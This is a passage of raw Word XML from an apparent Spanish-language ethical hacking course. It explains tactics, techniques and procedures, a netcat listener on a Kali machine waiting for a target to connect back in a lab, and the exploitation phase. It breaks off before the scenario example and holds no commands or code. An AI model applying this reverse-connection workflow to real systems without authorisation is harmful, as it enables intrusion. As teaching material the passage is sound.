          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1989"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1277"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explica los métodos asociados con un actor de amenazas específico o un grupo de actores de amenazas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B7B50" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="86"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D36660F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1988"/>
        </w:tabs>
        <w:ind w:left="1988" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Una "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>táctica</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">" es la descripción de más alto nivel del comportamiento de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>los</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>actores</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>amenazas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF6178D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="119"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF26EB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1989"/>
          <w:tab w:val="left" w:pos="2084"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1383"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Técnicas" </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">dar una descripción más detallada del comportamiento en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>contexto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>una</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>táctica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="688E2AEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="137"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31120577" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1989"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1163"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Procedimientos</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">" una descripción aún más detallada, de nivel inferior, en el contexto de una </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>técnica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B687CA0"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440" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1281CA2A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1481"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1481" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Oyente:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18355E0A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="410"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526562A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2201"/>
        </w:tabs>
        <w:ind w:left="2201" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El agente de escucha espera una conexión entrante desde el equipo de destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685686C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2202"/>
        </w:tabs>
        <w:spacing w:before="380" w:line="352" w:lineRule="auto"/>
        <w:ind w:right="1250"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En nuestro escenario de laboratorio, escucharemos en nuestra máquina Kali y la máquina objetivo puede volver a conectarse a nuestra máquina después de una explotación exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703B7FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2201"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:ind w:left="2201" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Básicamente, escuchar significa abrir un puerto y esperar la conexión desde el destino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5A2E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="279"/>
        <w:ind w:left="2202"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47372A6B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2202"/>
        </w:tabs>
        <w:spacing w:before="379" w:line="352" w:lineRule="auto"/>
        <w:ind w:right="1435"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas como netcat es uno de los mejores ejemplos disponibles para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>plataformas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows y Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63350C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="352" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="940" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF6CF99" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2184"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:ind w:left="2184" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2986E9F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="322"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C96F5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2478"/>
        </w:tabs>
        <w:ind w:left="2478" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La explotación es una fase que se debe realizar después de la identificación adecuada de una vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1E7BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2479"/>
        </w:tabs>
        <w:spacing w:before="380" w:line="352" w:lineRule="auto"/>
        <w:ind w:left="2479" w:right="769"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un servicio que se ejecuta en un sistema, una aplicación web, software son el objetivo principal de la explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3931A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2479"/>
        </w:tabs>
        <w:spacing w:before="103" w:line="355" w:lineRule="auto"/>
        <w:ind w:left="2479" w:right="706"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La identificación incorrecta de la vulnerabilidad con varios problemas de incompatibilidad puede bloquear el servicio o software vulnerable/objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F1FB1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2478"/>
        </w:tabs>
        <w:spacing w:before="95"/>
        <w:ind w:left="2478" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por lo tanto, el objetivo debe enumerarse intensamente antes de entrar en esta fase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF9B92" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1160" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C01AD0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1055"/>
        </w:tabs>
        <w:spacing w:before="56" w:line="352" w:lineRule="auto"/>
        <w:ind w:right="1906"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Básicamente, en esta fase el atacante entra en el sistema objetivo después de aprovechar la vulnerabilidad existente en el producto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1712E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1055"/>
        </w:tabs>
        <w:spacing w:before="206" w:line="352" w:lineRule="auto"/>
        <w:ind w:right="1210"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El acceso puede ser físico o remoto, pero lo demostraremos en una situación remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EFE6D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1054"/>
        </w:tabs>
        <w:spacing w:before="208"/>
        <w:ind w:left="1054" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Si el exploit tiene éxito, se ejecuta el código real de la carga útil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687702D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1054"/>
        </w:tabs>
        <w:spacing w:before="524"/>
        <w:ind w:left="1054" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo específico del escenario: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B407C8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
